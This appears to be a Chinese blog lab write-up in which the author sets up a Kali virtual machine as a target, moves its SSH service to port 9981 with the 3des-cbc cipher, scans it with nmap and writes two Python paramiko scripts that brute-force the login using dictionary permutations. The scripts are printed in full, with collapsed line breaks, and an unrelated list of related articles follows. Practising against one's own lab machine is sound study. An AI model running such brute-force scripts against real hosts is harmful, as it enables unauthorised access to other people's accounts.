自搭靶机实现SSH爆破复现记录

2024-09-01 16:28

本文主要是介绍自搭靶机实现SSH爆破复现记录,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

编写脚本实现ssh爆破。可使用paramiko、pexpect、pxssh等Python模块进行编写。但在ssh服务端将配置加密方式为非常用加密方式3des-cbc,端口为9981端口。

创建 了一个新的Kali虚拟机作为靶机,使用原本的Kali作为攻击机。

image-20240828192346167

设置一个用户为target1234,用户密码为targetpasswd123。

root用户为kaliTarget:

登录进去后查看靶机的IP地址:

image-20240828223122612

相同方法获取攻击机IP:

最后获得攻击机IP:192.168.91.130

靶机IP:192.168.91.129

调节靶机ssh服务端口为9981,加密方式为非常用加密方式3des-cbc,允许root用户通过密码登录:

image-20240828232315661

重启ssh服务:

image-20240828231038300

使用本地连接测试一下有没有设置成功:

image-20240829110901198

链接成功,说明配置生效了。

OK,断开连接:

image-20240829111411416

到这里做好了靶机的准备工作,我们接下来去攻击机上实现ssh攻击:

先使用nmap扫描靶机开放的端口:

image-20240829111954179

发现未扫描到可用端口,加大端口扫描范围:

扫描到9981端口开放:

image-20240829112121611

接下来我们去设置字典方便ssh爆破操作:

初始我们认为靶机密码为5到15位,包含大小写字符和数字。

计算得组合可能为781,514,782,079,074,318,841,757,344种,需要消耗极大的计算资源,所以我们需要继续配置字典策略。

介于密码一般长度,我们设置一组常用字典,包含常用组合和数字,然后组合三次,预计对于n组关键字的字典,能产生n3种密码。

获取关键字:设定场景我们已知靶机账户名,从账户名中获得关键字target,Target,Kali,kali,结合常见字段获得字典。

截图示例(设置字典):

image-20240829132417941

在Kali上安装paramiko模块,截图显示kali上已经存在了该模块,路径为/usr/lib/python3/dist-packages (3.4.0)

书写脚本:

image-20240829171545969

脚本设计策略:选择一组高频关键词词典,使用itertools.permutations 函数完成每三个关键词之间的全排列:

脚本内容:

import paramiko
import socket
from itertools import permutations def ssh_brute_force(target_ip, port, username, password_combinations):client = paramiko.SSHClient()client.set_missing_host_key_policy(paramiko.AutoAddPolicy())for password in password_combinations:try:password_str = ''.join(password)print(f"[*] Trying: {username}:{password_str}")client.connect(target_ip, port=port, username=username, password=password_str, look_for_keys=False, allow_agent=False,ciphers=["3des-cbc"])  # 指定使用3des-cbc加密方式print(f"[+] Success! Username: {username} Password: {password_str}")return Trueexcept paramiko.AuthenticationException:print("[-] Authentication failed.")except socket.error as e:print(f"[!] Connection failed: {e}")except paramiko.SSHException as e:print(f"[!] SSH Error: {e}")return False# 读取文件中的关键词
password_file = 'passwords.txt'
with open(password_file, 'r') as file:keywords = file.read().splitlines()# 生成每三个关键词的全排列组合
password_combinations = list(permutations(keywords, 3))target_ip = '192.168.91.129'
port = 9981
username = 'target1234'# 开始暴力破解
ssh_brute_force(target_ip, port, username, password_combinations)

运行脚本:

image-20240829174253916

报错显示paramikoSSHClient.connect() 方法中不接受 ciphers 作为参数

在建立SSH连接时,先通过 paramiko.Transport 设置允许的加密算法,再通过 Transport 对象连接SSH。

代码:

mport paramiko
import socket
from itertools import permutationsdef ssh_brute_force(target_ip, port, username, password_combinations):for password in password_combinations:try:password_str = ''.join(password)print(f"[*] Trying: {username}:{password_str}")# 创建Transport对象并指定加密算法transport = paramiko.Transport((target_ip, port))transport.connect(username=username, password=password_str)transport.get_security_options().ciphers = ['3des-cbc']# 建立SSH连接client = paramiko.SSHClient()client.set_missing_host_key_policy(paramiko.AutoAddPolicy())client._transport = transportprint(f"[+] Success! Username: {username} Password: {password_str}")transport.close()return Trueexcept paramiko.AuthenticationException:print("[-] Authentication failed.")except socket.error as e:print(f"[!] Connection failed: {e}")except paramiko.SSHException as e:print(f"[!] SSH Error: {e}")finally:transport.close()return False# 读取文件中的关键词
password_file = '/home/f34301/dictionry.txt'
with open(password_file, 'r') as file:keywords = file.read().splitlines()# 生成每三个关键词的全排列组合
password_combinations = list(permutations(keywords, 3))target_ip = '192.168.91.129'
port = 9981
username = 'target1234'# 开始暴力破解
ssh_brute_force(target_ip, port, username, password_combinations)

修改脚本并运行:

image-20240829174724333

可以看到运行成功开始尝试了。

等待代码运行。

image-20240829182820427

最后看到通过我们不懈的努力,终于攻击成功了。

ame, password_combinations)

修改脚本并运行:[外链图片转存中...(img-8jiW3QEx-1725173392168)]可以看到运行成功开始尝试了。等待代码运行。[外链图片转存中...(img-Wgi80inT-1725173392168)]最后看到通过我们不懈的努力,终于攻击成功了。

这篇关于自搭靶机实现SSH爆破复现记录的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/1127453

相关文章

hdu1043(八数码问题,广搜 + hash(实现状态压缩) )

利用康拓展开将一个排列映射成一个自然数,然后就变成了普通的广搜题。 #include<iostream>#include<algorithm>#include<string>#include<stack>#include<queue>#include<map>#include<stdio.h>#include<stdlib.h>#include<ctype.h>#inclu

【C++】_list常用方法解析及模拟实现

相信自己的力量,只要对自己始终保持信心,尽自己最大努力去完成任何事,就算事情最终结果是失败了,努力了也不留遗憾。💓💓💓 目录   ✨说在前面 🍋知识点一:什么是list? •🌰1.list的定义 •🌰2.list的基本特性 •🌰3.常用接口介绍 🍋知识点二:list常用接口 •🌰1.默认成员函数 🔥构造函数(⭐) 🔥析构函数 •🌰2.list对象

【Prometheus】PromQL向量匹配实现不同标签的向量数据进行运算

✨✨ 欢迎大家来到景天科技苑✨✨ 🎈🎈 养成好习惯,先赞后看哦~🎈🎈 🏆 作者简介:景天科技苑 🏆《头衔》:大厂架构师,华为云开发者社区专家博主,阿里云开发者社区专家博主,CSDN全栈领域优质创作者,掘金优秀博主,51CTO博客专家等。 🏆《博客》:Python全栈,前后端开发,小程序开发,人工智能,js逆向,App逆向,网络系统安全,数据分析,Django,fastapi

让树莓派智能语音助手实现定时提醒功能

最初的时候是想直接在rasa 的chatbot上实现,因为rasa本身是带有remindschedule模块的。不过经过一番折腾后,忽然发现,chatbot上实现的定时,语音助手不一定会有响应。因为,我目前语音助手的代码设置了长时间无应答会结束对话,这样一来,chatbot定时提醒的触发就不会被语音助手获悉。那怎么让语音助手也具有定时提醒功能呢? 我最后选择的方法是用threading.Time

Android实现任意版本设置默认的锁屏壁纸和桌面壁纸(两张壁纸可不一致)

客户有些需求需要设置默认壁纸和锁屏壁纸  在默认情况下 这两个壁纸是相同的  如果需要默认的锁屏壁纸和桌面壁纸不一样 需要额外修改 Android13实现 替换默认桌面壁纸: 将图片文件替换frameworks/base/core/res/res/drawable-nodpi/default_wallpaper.*  (注意不能是bmp格式) 替换默认锁屏壁纸: 将图片资源放入vendo

C#实战|大乐透选号器[6]:实现实时显示已选择的红蓝球数量

哈喽,你好啊,我是雷工。 关于大乐透选号器在前面已经记录了5篇笔记,这是第6篇; 接下来实现实时显示当前选中红球数量,蓝球数量; 以下为练习笔记。 01 效果演示 当选择和取消选择红球或蓝球时,在对应的位置显示实时已选择的红球、蓝球的数量; 02 标签名称 分别设置Label标签名称为:lblRedCount、lblBlueCount

Kubernetes PodSecurityPolicy:PSP能实现的5种主要安全策略

Kubernetes PodSecurityPolicy:PSP能实现的5种主要安全策略 1. 特权模式限制2. 宿主机资源隔离3. 用户和组管理4. 权限提升控制5. SELinux配置 💖The Begin💖点点关注,收藏不迷路💖 Kubernetes的PodSecurityPolicy(PSP)是一个关键的安全特性,它在Pod创建之前实施安全策略,确保P

工厂ERP管理系统实现源码(JAVA)

工厂进销存管理系统是一个集采购管理、仓库管理、生产管理和销售管理于一体的综合解决方案。该系统旨在帮助企业优化流程、提高效率、降低成本,并实时掌握各环节的运营状况。 在采购管理方面,系统能够处理采购订单、供应商管理和采购入库等流程,确保采购过程的透明和高效。仓库管理方面,实现库存的精准管理,包括入库、出库、盘点等操作,确保库存数据的准确性和实时性。 生产管理模块则涵盖了生产计划制定、物料需求计划、

Node.js学习记录(二)

目录 一、express 1、初识express 2、安装express 3、创建并启动web服务器 4、监听 GET&POST 请求、响应内容给客户端 5、获取URL中携带的查询参数 6、获取URL中动态参数 7、静态资源托管 二、工具nodemon 三、express路由 1、express中路由 2、路由的匹配 3、路由模块化 4、路由模块添加前缀 四、中间件

C++——stack、queue的实现及deque的介绍

目录 1.stack与queue的实现 1.1stack的实现  1.2 queue的实现 2.重温vector、list、stack、queue的介绍 2.1 STL标准库中stack和queue的底层结构  3.deque的简单介绍 3.1为什么选择deque作为stack和queue的底层默认容器  3.2 STL中对stack与queue的模拟实现 ①stack模拟实现